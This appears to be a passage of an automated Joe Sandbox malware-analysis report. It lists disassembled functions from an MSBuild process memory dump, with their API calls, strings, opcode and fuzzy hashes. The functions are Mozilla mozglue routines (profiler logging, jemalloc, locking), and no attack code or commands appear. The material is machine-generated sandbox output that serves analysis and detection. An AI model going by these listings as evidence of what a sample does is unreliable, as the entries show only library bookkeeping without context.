                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1880959753-0
                                                                                                                                                                                                                                                                            • Opcode ID: 6957d35e98bf5058bf1b1eb71b38cbbe4139161601dc60fec0c506f7f2c04078
                                                                                                                                                                                                                                                                            • Instruction ID: b8fb95ff503a85780a3e67d3827cb15cbfee000147c47f8c31a5101c23877dfc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6957d35e98bf5058bf1b1eb71b38cbbe4139161601dc60fec0c506f7f2c04078
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534178B52007149FCB24DF28C488A5ABBF9FF89318F14452EE99A87B41CB31F854CB91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF84F3
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF850A
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF851E
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF855B
                                                                                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF856F
                                                                                                                                                                                                                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF85AC
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF767F
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF7693
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CAF85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF76A7
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CAF85B2
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CAD5EDB
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: memset.VCRUNTIME140(6CB17765,000000E5,55CCCCCC), ref: 6CAD5F27
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAD5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CAD5FB2
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2666944752-0
                                                                                                                                                                                                                                                                            • Opcode ID: 56cec2c8bb0c277ee4ed675c31cbcb2947ae4b55d107aa5f1308b59bc4c24c5d
                                                                                                                                                                                                                                                                            • Instruction ID: 24f2d7681d9d7515ae72b3ee427b0ee3b4c7267a0e650000f427285e8a9d266e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56cec2c8bb0c277ee4ed675c31cbcb2947ae4b55d107aa5f1308b59bc4c24c5d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621EF752006018FDB24DB25D888A5AB7B9BF4130DF18092CE56FC3B41DB34F889CB40
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAFF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: GetCurrentProcess.KERNEL32(?,6CAB31A7), ref: 6CAECBF1
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAECBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CAB31A7), ref: 6CAECBFA
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CAC4A68), ref: 6CAF945E
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CAF9470
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CAF9482
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF9420: __Init_thread_footer.LIBCMT ref: 6CAF949F
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFF619
                                                                                                                                                                                                                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CAFF598), ref: 6CAFF621
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CAF94EE
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAF94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CAF9508
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CAFF637
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CB3F4B8,?,?,00000000,?,6CAFF598), ref: 6CAFF645
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CB3F4B8,?,?,00000000,?,6CAFF598), ref: 6CAFF663
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CAFF62A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                                                                            • API String ID: 1579816589-753366533
                                                                                                                                                                                                                                                                            • Opcode ID: 090a960ba2a7b3c641fa53759b933fbf186d1b20fe0d99bb9de0e9ddf1d30184
                                                                                                                                                                                                                                                                            • Instruction ID: 1ed9e06a32ea6807e17da009c1468d3f58220e1e86f781f30650da5d13b02348
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 090a960ba2a7b3c641fa53759b933fbf186d1b20fe0d99bb9de0e9ddf1d30184
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB11E735201614ABDB14AF28C9449ED77B9FB86369B100459FA1983F41CB71AC1ACBA0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6CAECFAE,?,?,?,6CAB31A7), ref: 6CAF05FB
                                                                                                                                                                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6CAECFAE,?,?,?,6CAB31A7), ref: 6CAF0616
                                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6CAB31A7), ref: 6CAF061C
                                                                                                                                                                                                                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6CAB31A7), ref: 6CAF0627
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _writestrlen
                                                                                                                                                                                                                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                                                                            • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                                                                            • Opcode ID: d665b16b5667822019074eefad49a494339e7d0b68461a5d3f4a2454371694c9
                                                                                                                                                                                                                                                                            • Instruction ID: 33a68323d5845126c41a44d1310e22d8b4132cab07a6704e7e4af7c86ef518ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d665b16b5667822019074eefad49a494339e7d0b68461a5d3f4a2454371694c9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EBE08CE2A0109037F614225AAC86DBB765CDBC6234F080039FD0D83301E95EED1A51F7
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAC05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: d9948b7243e3073cfad7254eb16861d3a69cb4c85f098eb6a700a68b88068d64
                                                                                                                                                                                                                                                                            • Instruction ID: 02be2e096a903b9df9af4da5df0c1ef85774af2f1ac63fab9f0f55c90939879b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9948b7243e3073cfad7254eb16861d3a69cb4c85f098eb6a700a68b88068d64
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E1A149B4A00645CFDB24CF29C594A9EFBF1BF49304F44866ED84A97B00E770A999CF91
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB114A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB114C5
                                                                                                                                                                                                                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CB114E2
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB11546
                                                                                                                                                                                                                                                                            • InitializeConditionVariable.KERNEL32(?), ref: 6CB115BA
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB116B4
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1909280232-0
                                                                                                                                                                                                                                                                            • Opcode ID: 7fc32b5d2731a77c9f2b533fe4db01e8f9b40e33ea8188b68966d15e60211b4b
                                                                                                                                                                                                                                                                            • Instruction ID: 4a47abac98cdd5df98f50b04d3177698e8716e16453d6d346b5ccd5b9c37bb38
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fc32b5d2731a77c9f2b533fe4db01e8f9b40e33ea8188b68966d15e60211b4b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B61E271A047949BDB219F24D880BDE77B4FF99308F44851CED8A57B01DB31E949CB92
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CB0DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CB0DC60
                                                                                                                                                                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CB0D38A,?), ref: 6CB0DC6F
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6CB0D38A,?), ref: 6CB0DCC1
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CB0D38A,?), ref: 6CB0DCE9
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CB0D38A,?), ref: 6CB0DD05
                                                                                                                                                                                                                                                                            • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CB0D38A,?), ref: 6CB0DD4A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1842996449-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0e87e46cea80cb14111716bc00de62bbf6b844130d1d1e7f9750349af6dbfc6b
                                                                                                                                                                                                                                                                            • Instruction ID: e5bd4a7cb3d7c3b0fc38df583af4c3df785fbd1ddd985902c1b0570d89c5c4b8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e87e46cea80cb14111716bc00de62bbf6b844130d1d1e7f9750349af6dbfc6b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C24156B5B006158FCB10CFA9D88099EBBB6FF88318B554569DA09ABB51DB31FC04CB90
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAF6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: GetCurrentThreadId.KERNEL32 ref: 6CAEFA8D
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAEFA80: AcquireSRWLockExclusive.KERNEL32(6CB3F448), ref: 6CAEFA99
                                                                                                                                                                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CAF6727
                                                                                                                                                                                                                                                                            • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CAF67C8
                                                                                                                                                                                                                                                                              • Part of subcall function 6CB04290: memcpy.VCRUNTIME140(?,?,6CB12003,6CB10AD9,?,6CB10AD9,00000000,?,6CB10AD9,?,00000004,?,6CB11A62,?,6CB12003,?), ref: 6CB042C4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                                            • String ID: data
                                                                                                                                                                                                                                                                            • API String ID: 511789754-2918445923
                                                                                                                                                                                                                                                                            • Opcode ID: 73a0c5522650f5206bc48f6181735a9f0a830c1afe3c71876868c05f7f03bdef
                                                                                                                                                                                                                                                                            • Instruction ID: a7bea7afc162b584b13fb98eb2020d0ea6b602ed417605235481bfa333b86e0b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73a0c5522650f5206bc48f6181735a9f0a830c1afe3c71876868c05f7f03bdef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD1C2757083808FD724DF24D851BAFBBE5AFD5308F14492DE49987B51DB30A889CB52
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAED5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CABEB57,?,?,?,?,?,?,?,?,?), ref: 6CAED652
                                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CABEB57,?), ref: 6CAED660
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CABEB57,?), ref: 6CAED673
                                                                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CAED888
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                                            • String ID: |Enabled
                                                                                                                                                                                                                                                                            • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                                                                            • Opcode ID: a45f1f44e00a869de30a504c3b9468e0eddedb63244dff5c1ed9b08a8c2ab32c
                                                                                                                                                                                                                                                                            • Instruction ID: d44288bc8a7004215aa6ae1cd477491143713993f7a80f2802349f3705eb39d0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45f1f44e00a869de30a504c3b9468e0eddedb63244dff5c1ed9b08a8c2ab32c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0A1E3B0E043458FDB11CF69C4906AEBBF5AF89318F18805DD889AB741D735A889CBE1
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            Function 6CAEF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CAEF480
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: LoadLibraryW.KERNEL32(shell32,?,6CB2D020), ref: 6CABF122
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CABF132
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6CAEF555
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CAC1248,6CAC1248,?), ref: 6CAC14C9
                                                                                                                                                                                                                                                                              • Part of subcall function 6CAC14B0: memcpy.VCRUNTIME140(?,6CAC1248,00000000,?,6CAC1248,?), ref: 6CAC14EF
                                                                                                                                                                                                                                                                              • Part of subcall function 6CABEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CABEEE3
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32 ref: 6CAEF4FD
                                                                                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CAEF523
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2152487453.000000006CAB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CAB0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2152437074.000000006CAB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153445021.000000006CB2D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153571983.000000006CB3E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2153615536.000000006CB42000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_6cab0000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                                            • String ID: \oleacc.dll
                                                                                                                                                                                                                                                                            • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                                            • Opcode ID: 35d3f3ac31901cc5b837d49eb2e9da20967a9fc853be8503062118a130f76315
                                                                                                                                                                                                                                                                            • Instruction ID: 60806be445523e91233a4d3d348b9c08e8e423814dec11ca4f18208885ea3a96
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35d3f3ac31901cc5b837d49eb2e9da20967a9fc853be8503062118a130f76315
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 734192706087509FD720DF29DD84A9AB7F4EF98318F500A1CF59593690EB34D989CBE2
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

